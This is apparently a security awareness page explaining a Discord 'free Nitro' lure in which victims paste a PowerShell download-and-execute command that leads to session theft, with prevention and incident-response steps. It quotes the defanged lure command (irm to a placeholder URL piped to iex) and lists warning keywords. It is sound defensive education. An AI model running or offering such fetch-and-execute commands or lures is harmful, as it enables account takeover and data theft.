1.

What the user sees

The lure presented to the victim

Nitro GiveawaysBOTToday at 12:34

Limited-time free Nitro. Run the command below to claim it.

This method is supposedly being removed soon, so act quickly.

powershell -c "irm hxxps://example[.]invalid/nitro.ps1 | iex"
Why people comply

The message combines a reward, trust borrowed from a friend or familiar server, and artificial urgency. That combination makes an otherwise unusual request to run a command feel acceptable.

2.

What happens behind the scenes

The technical attack flow

1Victim runs command
2Remote code is downloaded
3Malware executes
4Session or data is stolen
5Account is accessed
3.

Technical breakdown

What the command is doing

This sample has been modified for safety. Do not execute it.
PowerShell · defanged sample
$response = Invoke-WebRequest "hxxps://example[.]invalid/payload"
# The returned content is intentionally not executed in this sample.

The example represents a common pattern: send a web request, receive text from a remote server, and evaluate the response as code. The domain and syntax have been replaced or truncated.

iwr

Invoke-WebRequest (iwr) sends HTTP or HTTPS requests to a web page or service.

iex

Invoke-Expression (iex) evaluates a supplied string as a PowerShell command.

Why the combination matters

Combining download and execution in one line prevents the user from reviewing the payload and lets the remote operator change it later.

4.

Why 2FA alone may not stop it

Authentication and sessions protect different stages

2FA is still important. It primarily strengthens verification for a new sign-in. Theft of an already authenticated session occurs after that stage.

Normal sign-in
  1. 1Enter password
  2. 2Complete 2FA
  3. 3Authentication succeeds
  4. 4Session is issued
Session theft
  1. 1Malware runs
  2. 2Existing session is stolen
  3. 3Authenticated state is reused
  4. 4Account is operated
The attacker is stealing the state created after 2FA

A session token helps maintain an authenticated state. If a valid session is stolen, an attacker may reuse that state instead of entering the password and completing 2FA again. Enabling 2FA does not necessarily revoke a session that has already been stolen; the session must be invalidated.

1.

Prevention

Actions that stop this attack

  • Do not trust instructions that require PowerShell or CMD to activate a free feature
  • Stop when a command contains iwr, irm, iex, curl, or an unfamiliar shortened URL
  • Verify the request through another channel even when it comes from a friend
  • Enable Discord 2FA and store backup codes safely
  • Keep the operating system, browser, and Discord updated
2.

If you already ran it

Prioritized incident response

The order matters

Changing a password on a potentially infected device may expose the new password too. Disconnect it first and, where possible, secure the account from another trusted device.

  1. 1
    Disconnect the device

    Disable Wi-Fi or unplug Ethernet to stop additional communication and spread.

  2. 2
    Change passwords from a trusted device

    Change Discord and every service that reused the same password.

  3. 3
    Log out all sessions

    Invalidate authenticated sessions that may have been stolen.

  4. 4
    Review and reset 2FA

    Check authenticators, passkeys, backup codes, and recovery methods.

  5. 5
    Scan and clean the device

    Update your security software and run a full scan.

  6. 6
    Warn contacts and server staff

    Tell people not to open messages, links, or files sent from your account.

Open the full incident-response checklist
5.

Related techniques

Continue understanding the attack

6.

Sources

Primary references and further reading